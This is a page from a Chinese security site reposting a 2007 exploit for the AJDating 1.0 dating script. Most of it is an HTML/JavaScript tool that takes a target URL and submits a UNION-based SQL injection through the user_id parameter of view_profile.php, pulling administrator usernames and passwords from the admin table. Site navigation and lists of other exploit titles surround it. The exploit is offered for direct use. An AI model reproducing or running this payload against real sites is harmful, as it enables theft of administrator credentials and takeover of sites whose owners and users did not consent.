首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 AJDating 1.0 (view_profile.php) Remote SQL Injection Exploit 来源：www.vfocus.net 作者：ajann 发布时间：2007-03-06   <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>AJDating 1.0 (view_profile.php) Remote BLIND SQL Injection Exploit</title> <script language="JavaScript"> //'=============================================================================================== //'[Script Name: AJDating 1.0 (view_profile.php) Remote BLIND SQL Injection Exploit //'[Coded by   : ajann //'[Author     : ajann //'[Contact    : :( //'[S.Page     : http://www.ajsquare.com //'[$$         : 250 USD - 1000 USD //'[Using      : Write Target after Submit Click //'=============================================================================================== //# ajann,Turkey //# ...         //Basic exploit,but any time : (    var path="/"    var adres="/view_profile.php" //File name    var acik ="?user_id=" // Line x    var sql="-1%20union%20select%201,2,3,4,5,6,0,0,0,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0,0,0,7,7,5,4,7,7,8,0,0,1,0,0,2,3,4,0,0,0,0,4,4,4,4,4,3,2,1%20from%20admin/*" //      function command(){        if (document.rfi.target1.value==""){           alert("Failed..");       return false;     }     rfi.action= document.rfi.target1.value+path+adres+acik+sql; // Ready Target : )   rfi.submit(); // Form Submit    } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">AJDating 1.0 (view_profile.php) Remote BLIND SQL Injection Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();">     <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial">   </font><font color="#FF0000" size="2">&nbsp;</font></b>   <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>   <p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">ajann</font></b></p> </center> </body> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·AJ Auction Pro All Versions (s ·AJ Forum 1.0 (topic_title.php) ·Asterisk <= 1.2.15 / 1.4.0 pre ·Konqueror 3.5.5 (JavaScript Re ·WebMod 0.48 (Content-Length) R ·Links Management Application 1 ·PHP 4 Userland ZVAL Reference ·PHP 4 unserialize() ZVAL Refer ·phpMyFAQ <= 1.6.7 Remote SQL I ·PHP < 4.4.5 / 5.2.1 php_binary ·DivX Web Player 1.3.0 (npdivx3 ·PHP < 4.4.5 / 5.2.1 WDDX Sessi   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved